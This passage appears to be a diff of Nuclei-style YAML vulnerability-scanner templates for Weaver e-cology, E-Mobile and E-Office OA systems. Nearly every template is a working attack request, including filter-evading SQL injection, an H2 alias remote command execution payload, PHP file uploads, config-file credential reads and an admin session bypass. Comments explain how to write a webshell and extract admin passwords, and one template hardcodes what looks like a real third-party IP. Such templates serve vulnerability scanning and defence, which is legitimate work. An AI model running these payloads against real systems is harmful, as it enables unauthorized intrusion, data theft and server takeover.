------WebKitFormBoundaryVdb2RRl25PuaGhWj--
- |
POST /OfficeServer HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryVdb2RRl25PuaGhWj
Accept-Encoding: gzip
------WebKitFormBoundaryVdb2RRl25PuaGhWj
Content-Disposition: form-data; name="aaa"
{"OPTION":"INSERTIMAGE","isInsertImageNew":"1","imagefileid4pic":"{{fileid}}"}
------WebKitFormBoundaryVdb2RRl25PuaGhWj--
- |
GET /{{randstr_1}}.jsp HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Accept-Encoding: gzip
extractors:
- type: regex
name: fileid
internal: true
group: 1
regex:
- "&fileid=(.*?)\'>"
req-condition: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- "status_code_1 == 200 && contains(body_1,'workrelate/plan/util/ViewDoc')"
- "contains(body_2, 'println') && status_code_2 == 200"
- "status_code_3 == 200 && contains(body_3,'{{randstr_2}}')"
condition: and
# Enhanced by md on 2022/10/31

34
http/vulnerabilities/weaver/weaver-e-cology-validate-sqli.yaml Executable file
View File

@ -0,0 +1,34 @@
id: weaver-e-cology-validate-sqli
info:
name: weaver-e-cology-validate-sqli
author: SleepingBag945
severity: high
description: 泛微e-cology OA系统的validate.jsp文件中因为对参数capitalid过滤不严可致使SQL注入漏洞。攻击者运用该漏洞可在未授权的情况下远程发送精心构造的SQL语句从而取得数据库敏感信息。
tags: ecology,weaver,oa,sqli
http:
- raw:
- |
POST /cpt/manage/validate.jsp?sourcestring=validateNum HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
sourcestring=validateNum&capitalid=11%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0dunion+select+str(9039*926)&capitalnum=-10
matchers-condition: and
matchers:
- type: word
part: body
words:
- "8370114"
- type: status
status:
- 200
# Enhanced by md on 2022/10/31
# select%20password%20as%20id%20from%20HrmResourceManager 解密后可登录

41
http/vulnerabilities/weaver/weaver-e-cology-verifyquicklogin-arbitrary-login.yaml Executable file
View File

@ -0,0 +1,41 @@
id: weaver-e-cology-verifyquicklogin-arbitrary-login
info:
name: weaver e-cology verifyquicklogin.jsp arbitrarylogin
author: SleepingBag945
severity: high
description: 泛微OA E-Cology VerifyQuickLogin.jsp文件中存在任意管理员登录漏洞攻击者通过发送特殊的请求包可以获取管理员Session
reference:
- http://wiki.peiqi.tech/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20VerifyQuickLogin.jsp%20%E4%BB%BB%E6%84%8F%E7%AE%A1%E7%90%86%E5%91%98%E7%99%BB%E5%BD%95%E6%BC%8F%E6%B4%9E.html
metadata:
fofa-query: app="泛微-协同办公OA"
tags: ecology,weaver,oa
http:
- raw:
- |
POST /mobile/plugin/VerifyQuickLogin.jsp HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
identifier=1&language=1&ipaddress=x.x.x.x
matchers-condition: and
matchers:
- type: word
part: body
words:
- "\"sessionkey\":"
- type: word
part: body
words:
- "\"message\":"
- type: status
status:
- 200
# Enhanced by md on 2022/10/31

39
http/vulnerabilities/weaver/weaver-e-cology-workflowcentertreedata-sqli.yaml Executable file
View File

@ -0,0 +1,39 @@
id: weaver-e-cology-workflowcentertreedata-sqli
info:
name: weaver e-cology WorkflowCenterTreeData.jsp sqli
author: SleepingBag945
severity: high
description: 2019年10月10日CNVD发布了泛微e-cology OA系统存在SQL注入漏洞。该漏洞是由于OA系统的WorkflowCenterTreeData接口中涉及Oracle数据库的SQL语句缺乏安全检查措施所导致的任意攻击者都可借SQL语句拼接时机注入恶意payload造成SQL注入攻击。
reference:
- http://wiki.peiqi.tech/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20WorkflowCenterTreeData%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html
- https://wiki.96.mk/Web%E5%AE%89%E5%85%A8/%E6%B3%9B%E5%BE%AEoa/%E6%B3%9B%E5%BE%AEOA%20WorkflowCenterTreeData%E6%8E%A5%E5%8F%A3%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%28%E9%99%90oracle%E6%95%B0%E6%8D%AE%E5%BA%93%29/
tags: ecology,weaver,oa,sqli
http:
- raw:
- |
POST /mobile/browser/WorkflowCenterTreeData.jsp HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
node=wftype_1132232323231&scope=23332323&formids=1111111111111%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a)))union+select+1024,(4276*908)+order+by+(((1
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"id":"'
- type: word
part: body
words:
- '"text":"'
- type: status
status:
- 200
# Enhanced by md on 2022/10/31

43
http/vulnerabilities/weaver/weaver-e-mobile-client-do-rce.yaml Normal file
View File

@ -0,0 +1,43 @@
id: weaver-e-mobile-client-do-rce
info:
name: weaver-e-mobile-client-do-rce
author: SleepingBag945
severity: critical
description: 泛微E-Mobile 6.0远程命令执行漏洞
reference:
- https://mp.weixin.qq.com/s/z-WN2_MTxdk3z4LvchXkXw
tags: eBridge,weaver,oa,read
http:
- raw:
- |
POST /client.do HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{randstr}}
------WebKitFormBoundary{{randstr}}
Content-Disposition: form-data; name="method"
getupload
------WebKitFormBoundary{{randstr}}
Content-Disposition: form-data; name="uploadID"
1';CREATE ALIAS if not exists MzSNqKsZTagmf AS CONCAT('void e(String cmd) throws java.la','ng.Exception{','Object curren','tRequest = Thre','ad.currentT','hread().getConte','xtClass','Loader().loadC','lass("com.caucho.server.dispatch.ServletInvocation").getMet','hod("getContextRequest").inv','oke(null);java.la','ng.reflect.Field _responseF = currentRequest.getCl','ass().getSuperc','lass().getDeclar','edField("_response");_responseF.setAcce','ssible(true);Object response = _responseF.get(currentRequest);java.la','ng.reflect.Method getWriterM = response.getCl','ass().getMethod("getWriter");java.i','o.Writer writer = (java.i','o.Writer)getWriterM.inv','oke(response);java.ut','il.Scan','ner scan','ner = (new java.util.Scann','er(Runt','ime.getRunt','ime().ex','ec(cmd).getInput','Stream())).useDelimiter("\\A");writer.write(scan','ner.hasNext()?sca','nner.next():"");}');CALL MzSNqKsZTagmf('ipconfig');--
------WebKitFormBoundary{{randstr}}--
req-condition: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- status_code_1 == 200 && contains(body_1,'Windows IP')
condition: and

34
http/vulnerabilities/weaver/weaver-e-office-group-xml-sqli.yaml Executable file
View File

@ -0,0 +1,34 @@
id: weaver-oa-e-office-group-xml-sqli
info:
name: weaver-oa e-office group_xml sqli
author: SleepingBag945
severity: critical
description: 泛微OA E-Office group_xml.php SQL注入漏洞,可写shell
reference:
- http://wiki.peiqi.tech/wiki/oa/泛微OA/泛微OA%20E-Office%20group_xml.php%20SQL注入漏洞.html
tags: weaver,e-office,oa,sqli
http:
- raw:
- |
GET /inc/group_user_list/group_xml.php?par=W2dyb3VwXTpbMV18W2dyb3VwaWRdOlsxIHVuaW9uIHNlbGVjdCAnPD9waHAgcGhwaW5mbygpPz4nLDIsMyw0LDUsNiw3LDggaW50byBvdXRmaWxlICcuLi93ZWJyb290L3Z1bG50ZXN0LnBocCdd HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
- |
GET /vulntest.php HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
words:
- "phpinfo"
- type: status
status:
- 200
# 可构造exp写入shell
# [group]:[1]|[groupid]:[1 union select '<?php phpinfo()?>',2,3,4,5,6,7,8 into outfile '../webroot/vulntest.php']
# /inc/group_user_list/group_xml.php?par=W2dyb3VwXTpbMV18W2dyb3VwaWRdOlsxIHVuaW9uIHNlbGVjdCAnPD9waHAgcGhwaW5mbygpPz4nLDIsMyw0LDUsNiw3LDggaW50byBvdXRmaWxlICcuLi93ZWJyb290L3Z1bG50ZXN0LnBocCdd

44
http/vulnerabilities/weaver/weaver-e-office-login-quick-seesionkey.yaml Normal file
View File

@ -0,0 +1,44 @@
id: weaver-e-office-login-quick-seesionkey
info:
name: weaver-e-office-login-quick-seesionkey
author: zimuzhi
severity: high
description: 泛微OA E-Office login_quick.php 获取登录seesionnkey
tags: weaver,e-office,oa
http:
- raw:
- |
POST /E-mobile/App/System/Login/login_quick.php HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
identifier=admin
- |
GET /E-mobile/App/Init.php?m=all_Create&detailid=&fromid=&sessionkey={{timestamp}} HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Accept-Encoding: gzip
extractors:
- type: regex
name: timestamp
internal: true
group: 1
regex:
- '\"sessionkey\":\"(.*?)\"'
req-condition: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- "status_code_1 == 200 && contains(body_1,'{{timestamp}}')"
- "status_code_2 == 200 && contains(body_2,'<title>新建')"
condition: and

51
http/vulnerabilities/weaver/weaver-e-office-mobile-upload-save-arbitrary-file-upload.yaml Executable file
View File

@ -0,0 +1,51 @@
id: weaver-e-office-mobile-upload-save-arbitrary-file-upload
info:
name: weaver-e-office-mobile-upload-save-arbitrary-file-upload
author: SleepingBag945
severity: critical
description: 泛微e-office存在文件上传漏洞攻击者可利用该漏洞获取服务器控制权。
reference:
- https://forum.butian.net/share/1791
tags: weaver,e-office,oa
http:
- raw:
- |
POST /E-mobile/App/Ajax/ajax.php?action=mobile_upload_save HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarynejqegqr
Accept-Encoding: gzip
------WebKitFormBoundarynejqegqr
Content-Disposition: form-data; name="upload_quwan"; filename="{{randstr_1}}.php."
Content-Type: application/octet-stream
<?php echo "{{randstr_2}}"; unlink(__FILE__); ?>
------WebKitFormBoundarynejqegqr--
- |
GET /attachment/{{attachmentID}}/{{randstr_1}}.php HTTP/1.1
Host: 61.184.73.157:8082
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Accept-Encoding: gzip
extractors:
- type: regex
name: attachmentID
internal: true
regex:
- "[0-9]{10}"
req-condition: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- "status_code_1 == 200 && contains(body_1,'[1')"
- "contains(body_2, '{{randstr_2}}') && status_code_2 == 200"
condition: and

30
http/vulnerabilities/weaver/weaver-e-office-mysql-config-info-leak.yaml Normal file
View File

@ -0,0 +1,30 @@
id: weaver-oa-e-office-mysql-config-info-leak
info:
name: weaver-oa e-office mysql_config.ini info-leak
author: SleepingBag945
severity: medium
description: 泛微 E-Office mysql_config.ini文件可直接访问泄漏数据库账号密码等信息
reference:
- http://wiki.peiqi.tech/wiki/oa/泛微OA/泛微OA%20E-Office%20mysql_config.ini%20数据库信息泄漏漏洞.html
tags: weaver,e-office,oa,info
http:
- raw:
- |
GET /mysql_config.ini HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
- raw:
- |
GET /building/backmgr/urlpage/mobileurl/configfile/jx2_config.ini HTTP/1.1
Host: {{Hostname}}
req-condition: true
matchers:
- type: dsl
dsl:
- 'status_code_1 == 200 && contains(body_1, "dataurl") && contains(body_1,"datapassword") && contains(body_1, "datauser")'
- 'status_code_2 == 200 && contains(body_2,"sip") && contains(body_2,"sdbuser") && contains(body_2,"sdbpassword")'
condition: or

31
http/vulnerabilities/weaver/weaver-e-office-officeserver-arbitrary-file-read.yaml Executable file
View File

@ -0,0 +1,31 @@
id: weaver-oa-e-office-officeserver-arbitrary-file-read
info:
name: weaver-oa e-office officeserver arbitrary file read
author: SleepingBag945
severity: high
description: 泛微OA E-Office officeserver.php 任意文件读取漏洞
reference:
- https://github.com/achuna33/MYExploit/blob/8ffbf7ee60cbd77ad90b0831b93846aba224ab29/src/main/java/com/achuna33/Controllers/WeaverEOfficeController.java
tags: weaver,e-office,oa
http:
- raw:
- |
GET /iweboffice/officeserver.php?OPTION=LOADFILE&FILENAME=../mysql_config.ini HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: word
words:
- "datapassword"
- type: word
words:
- "DBSTEP"
- type: status
status:
- 200
# Enhanced by cs on 2022/07/05

66
http/vulnerabilities/weaver/weaver-e-office-uploadify-arbitrary-file-upload.yaml Executable file
View File

@ -0,0 +1,66 @@
id: weaver-e-office-uploadify-arbitrary-file-upload
info:
name: weaver-e-office-uploadify-arbitrary-file-upload
author: SleepingBag945
severity: critical
description: 泛微OA E-Office uploadify.php 任意文件上传漏洞
reference:
- https://github.com/w-digital-scanner/w9scan/blob/master/plugins/weaver_oa/2158.py
tags: weaver,e-office,oa
http:
- raw:
- |
GET /general/weibo/javascript/LazyUploadify/uploadify.php HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Accept-Encoding: gzip
- |
POST /general/weibo/javascript/LazyUploadify/uploadify.php HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryjetvpuye
Accept-Encoding: gzip
------WebKitFormBoundaryjetvpuye
Content-Disposition: form-data; name="Filedata"; filename="{{randstr_1}}.php"
Content-Type: application/octet-stream
<?php echo "{{randstr_2}}";unlink(__FILE__);?>
------WebKitFormBoundaryjetvpuye--
- |
GET /attachment/{{attachmentID}}/{{attachmentName}} HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Accept-Encoding: gzip
extractors:
- type: regex
name: attachmentID
internal: true
group: 1
regex:
- "attachmentID\":(.*?),"
- type: regex
name: attachmentName
internal: true
group: 1
regex:
- "attachmentName\":\"(.*?)\","
req-condition: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- "status_code_1 == 200"
- "contains(body_2, 'attachmentID') && status_code_2 == 200"
- "status_code_3 == 200 && contains(body_3,'{{randstr_2}}')"
condition: and

53
http/vulnerabilities/weaver/weaver-e-office-uploadify-arbitrary-file-upload2.yaml Executable file
View File

@ -0,0 +1,53 @@
id: weaver-e-office-uploadify-arbitrary-file-upload2
info:
name: weaver-e-office-uploadify-arbitrary-file-upload2
author: SleepingBag945
severity: critical
description: 泛微OA E-Office uploadify.php 任意文件上传漏洞
reference:
- https://github.com/w-digital-scanner/w9scan/blob/master/plugins/weaver_oa/2158.py
tags: weaver,e-office,oa
http:
- raw:
- |
GET /general/weibo/javascript/uploadify/uploadify.php HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Accept-Encoding: gzip
- |
POST /general/weibo/javascript/uploadify/uploadify.php HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryjetvpuye
Accept-Encoding: gzip
------WebKitFormBoundaryjetvpuye
Content-Disposition: form-data; name="Filedata"; filename="{{randstr_1}}.php"
Content-Type: application/octet-stream
<?php echo "{{randstr_2}}";unlink(__FILE__);?>
------WebKitFormBoundaryjetvpuye--
- |
GET /attachment/personal/_temp.php HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Accept-Encoding: gzip
req-condition: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- "status_code_1 == 200"
- "contains(body_2, 'imageSrc') && status_code_2 == 200"
- "status_code_3 == 200 && contains(body_3,'{{randstr_2}}')"
condition: and

59
http/vulnerabilities/weaver/weaver-e-office-uploadify-arbitrary-file-upload3.yaml Executable file
View File

@ -0,0 +1,59 @@
id: weaver-e-office-uploadify-arbitrary-file-upload3
info:
name: weaver-e-office-uploadify-arbitrary-file-upload3
author: SleepingBag945
severity: critical
description: 泛微OA E-Office uploadify.php 任意文件上传漏洞
reference:
- https://github.com/w-digital-scanner/w9scan/blob/master/plugins/weaver_oa/2158.py
tags: weaver,e-office,oa
http:
- raw:
- |
GET /inc/jquery/uploadify/uploadify.php HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Accept-Encoding: gzip
- |
POST /inc/jquery/uploadify/uploadify.php HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryjetvpuye
Accept-Encoding: gzip
------WebKitFormBoundaryjetvpuye
Content-Disposition: form-data; name="Filedata"; filename="{{randstr_1}}.php"
Content-Type: application/octet-stream
<?php echo "{{randstr_2}}";unlink(__FILE__);?>
------WebKitFormBoundaryjetvpuye--
- |
GET /attachment/{{attachmentID}}/{{randstr_1}}.php HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Accept-Encoding: gzip
extractors:
- type: regex
name: attachmentID
internal: true
regex:
- "[0-9]{10}"
req-condition: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- "status_code_1 == 200"
- "status_code_2 == 200"
- "status_code_3 == 200 && contains(body_3,'{{randstr_2}}')"
condition: and

31
http/vulnerabilities/weaver/weaver-e-office-userselect-unauth.yaml Executable file
View File

@ -0,0 +1,31 @@
id: weaver-oa-e-office-userselect-unauth
info:
name: weaver-oa e-office userselect unauth
author: SleepingBag945
severity: high
description: 泛微OA E-Office UserSelect 未授权访问漏洞,泛微OA E-Office UserSelect接口存在未授权访问漏洞通过漏洞攻击者可以获取敏感信息
reference:
- https://github.com/achuna33/MYExploit/blob/8ffbf7ee60cbd77ad90b0831b93846aba224ab29/src/main/java/com/achuna33/Controllers/WeaverEOfficeController.java
- http://wiki.peiqi.tech/wiki/oa/泛微OA/泛微OA%20E-Office%20UserSelect%20未授权访问漏洞.html
tags: weaver,e-office,oa,sqli
http:
- raw:
- |
GET /UserSelect/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: word
words:
- "<title>选择人员</title>"
- type: word
words:
- "/UserSelect/dept.php"
- type: status
status:
- 200

80
http/vulnerabilities/weaver/weaver-e-office-v10-office-server-arbitrary-file-upload.yaml Executable file
View File

@ -0,0 +1,80 @@
id: weaver-oa-e-office-v10-office-server-arbitrary-file-upload
info:
name: weaver-oa e-office-v10 OfficeServer.php arbitrary file upload
author: SleepingBag945
severity: critical
description: 泛微OA E-Office OfficeServer.php 任意文件上传漏洞
reference:
